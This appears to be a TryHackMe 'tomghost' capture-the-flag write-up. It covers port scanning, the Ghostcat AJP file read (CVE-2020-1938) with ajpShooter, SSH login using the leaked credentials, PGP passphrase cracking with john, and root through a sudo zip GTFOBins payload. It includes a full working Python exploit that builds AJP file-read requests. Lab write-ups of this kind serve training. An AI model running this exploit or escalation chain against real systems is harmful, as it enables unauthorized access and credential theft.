tomghost

Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.

As the description says, this is an Easy room on TryHackMe. Initial access is easy, but the privilege escalation part is quite tricky.

Enumeration

1) First, a full port scan with masscan: masscan -e eth0 -p 1-65535 --rate=10000 -v 10.10.187.215

2) Then an nmap service scan of the open ports (22, 53, 8009, 8080): nmap -p 22,8080,53,8009 -sC -sV -v 10.10.187.215

Tomcat 9.0.30 is affected by Ghostcat (CVE-2020-1938), an arbitrary file read through the AJP connector listening on port 8009: exploit-db

3) Visiting the webpage at port 8080 confirms the version:

4) Found a tool (ajpShooter) that reads files from the web application through the AJP connector: GitHub Link

5) Give the script execute permission, then run it:

Now run the tool: ./ajpShooter.py http://10.10.187.215:8080 8009 /WEB-INF read

  • http://IP:8080 : the HTTP address Tomcat is served on (used for the Host header of the forged request)

  • 8009 : the port of the AJP (Apache JServ Protocol) connector that the request is sent to

  • /WEB-INF : the path to read, relative to the web application root

  • read : read the file and print its contents

The directory listing shows an /index.txt

6) Tried to read a file that every web application has, the deployment descriptor:

./ajpShooter.py http://10.10.187.215:8080 8009 /WEB-INF/web.xml read

web.xml contains a username:password pair
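The request ajpShooter sends on the AJP port is a binary AJP13 FORWARD_REQUEST in which three `javax.servlet.include.*` request attributes are set, so Tomcat's DefaultServlet serves the named file from inside the webapp (this is what makes Ghostcat a file read). The following is an added example, not code from this writeup or from the ajpShooter project: it builds that packet, parses the AJP response packets, and includes a constructed sample response so the parser can be exercised offline. The request URI `/asdf`, the remote address and the choice to send a plain `Host` header are assumptions; the attribute names and the packet layout follow the AJP13 protocol reference.

```python
"""AJP13 file-read request builder and response parser (Ghostcat, CVE-2020-1938).

Added example, not the writeup's or ajpShooter's own code.
"""
import socket
import struct

# AJP13 request codes
FORWARD_REQUEST = 2
SC_M_GET = 2            # method code for GET
REQ_ATTRIBUTE = 0x0A    # generic name/value request attribute
ATTR_TERMINATOR = 0xFF
# AJP13 response packet prefixes (container -> web server)
SEND_BODY_CHUNK = 3
SEND_HEADERS = 4
END_RESPONSE = 5
# Response header names that Tomcat sends as 2-byte codes instead of strings
RESP_HEADER_CODES = {
    0x01: "Content-Type", 0x02: "Content-Language", 0x03: "Content-Length",
    0x04: "Date", 0x05: "Last-Modified", 0x06: "Location", 0x07: "Set-Cookie",
    0x08: "Set-Cookie2", 0x09: "Servlet-Engine", 0x0A: "Status", 0x0B: "WWW-Authenticate",
}


def ajp_string(s):
    """Encode an AJP string: 2-byte big-endian length, bytes, NUL terminator; None -> 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def build_forward_request(target_file, host, server_port=8080):
    """Build a GET FORWARD_REQUEST whose include attributes point DefaultServlet at target_file."""
    body = bytes([FORWARD_REQUEST, SC_M_GET])
    body += ajp_string("HTTP/1.1")
    body += ajp_string("/asdf")            # req_uri (assumed; any path handled by DefaultServlet)
    body += ajp_string("127.0.0.1")        # remote_addr (assumed)
    body += ajp_string(None)               # remote_host
    body += ajp_string(host)               # server_name
    body += struct.pack(">H", server_port)
    body += b"\x00"                        # is_ssl = false
    body += struct.pack(">H", 1)           # num_headers
    body += ajp_string("Host") + ajp_string(host)   # header name sent as a plain string
    for name, value in (
        ("javax.servlet.include.request_uri", "/"),
        ("javax.servlet.include.path_info", target_file),  # the file actually served
        ("javax.servlet.include.servlet_path", "/"),
    ):
        body += bytes([REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([ATTR_TERMINATOR])
    return b"\x12\x34" + struct.pack(">H", len(body)) + body   # 0x1234 = request magic


def _read_string(buf, pos):
    """Decode an AJP string at buf[pos]; return (text or None, new position)."""
    length = struct.unpack(">H", buf[pos:pos + 2])[0]
    if length == 0xFFFF:
        return None, pos + 2
    end = pos + 2 + length
    return buf[pos + 2:end].decode(errors="replace"), end + 1   # +1 skips the NUL


def parse_ajp_response(data):
    """Walk the 'AB'-magic response packets; return (status, headers, body bytes)."""
    status, headers, body, pos = None, {}, b"", 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != b"AB":
            raise ValueError("bad AJP response magic at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        payload = data[pos + 4:pos + 4 + length]
        pos += 4 + length
        if not payload:
            continue
        code = payload[0]
        if code == SEND_HEADERS:
            status = struct.unpack(">H", payload[1:3])[0]
            _msg, p = _read_string(payload, 3)
            count = struct.unpack(">H", payload[p:p + 2])[0]
            p += 2
            for _ in range(count):
                if payload[p] == 0xA0:                      # coded header name
                    name, p = RESP_HEADER_CODES.get(payload[p + 1], "0xA0%02x" % payload[p + 1]), p + 2
                else:
                    name, p = _read_string(payload, p)
                value, p = _read_string(payload, p)
                headers[name] = value
        elif code == SEND_BODY_CHUNK:
            n = struct.unpack(">H", payload[1:3])[0]
            body += payload[3:3 + n]
        elif code == END_RESPONSE:
            break
    return status, headers, body


def read_file(host, ajp_port, target_file, timeout=5.0):
    """Send the forged request to a live AJP connector (network call, not run offline)."""
    with socket.create_connection((host, ajp_port), timeout=timeout) as s:
        s.sendall(build_forward_request(target_file, host))
        chunks = []
        while True:                 # Tomcat keeps the connection open, so stop on timeout or close
            try:
                part = s.recv(8192)
            except socket.timeout:
                break
            if not part:
                break
            chunks.append(part)
    return parse_ajp_response(b"".join(chunks))


# Constructed sample response (not captured from the room) used to exercise the parser.
def _packet(payload):
    return b"AB" + struct.pack(">H", len(payload)) + payload

SAMPLE_BODY = b"<web-app>\n  <!-- constructed sample, not the real web.xml -->\n</web-app>\n"
SAMPLE_RESPONSE = (
    _packet(bytes([SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK")
            + struct.pack(">H", 1) + b"\xa0\x01" + ajp_string("application/xml"))
    + _packet(bytes([SEND_BODY_CHUNK]) + struct.pack(">H", len(SAMPLE_BODY)) + SAMPLE_BODY + b"\x00")
    + _packet(bytes([END_RESPONSE, 1]))
)

if __name__ == "__main__":
    import sys
    st, hdrs, content = read_file(sys.argv[1], int(sys.argv[2]), sys.argv[3])
    print(st, hdrs)
    sys.stdout.write(content.decode(errors="replace"))
```

Run as `python3 ajp_read.py 10.10.187.215 8009 /WEB-INF/web.xml` against a reachable connector. The read is confined to the web application's document root, which is why `/WEB-INF/web.xml` works but `/etc/passwd` does not; the fix in Tomcat 9.0.31 was to disable the AJP connector by default and require a secret.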

Exploitation

7) The credentials from web.xml work over SSH: ssh skyfuck@10.10.187.215

8) user.txt is not in skyfuck's home but in another user's home directory, which skyfuck can read

Privilege escalation

9) Failed attempts

  • sudo -l shows no sudo rules for skyfuck

  • /etc/shadow and /etc/passwd are not writable

  • could not download and run any enumeration script on the machine

  • skyfuck has no sudo access, but merlin does

10) Other enumeration failed, but skyfuck's home directory contains a PGP-encrypted file (credential.pgp) and an ASCII-armoured key (tryhackme.asc)

11) First, import the ASCII armour as a key: gpg --import tryhackme.asc, then try to decrypt the file: gpg --decrypt credential.pgp (this asks for the passphrase protecting the private key)

12) Copy the .asc to the attack box and convert it; gpg2john extracts a crackable hash of the key's passphrase

  1. Download: scp skyfuck@10.10.187.215:tryhackme.asc /tmp

  2. Convert: /opt/john/gpg2john /tmp/tryhackme.asc > /tmp/hash

13) Crack the hash: john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash

14) Enter the cracked passphrase at the gpg --decrypt prompt in the shell on the target. The decrypted credential.pgp contains merlin's password

15) Log in as merlin: su merlin

merlin has sudo access: sudo -l shows that merlin may run zip via sudo

16) GTFOBins shows the sudo payload for zip: it abuses the -T (test archive) and -TT (test command) options so zip runs a shell as root, e.g. sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'. A slightly modified version of it gives root access
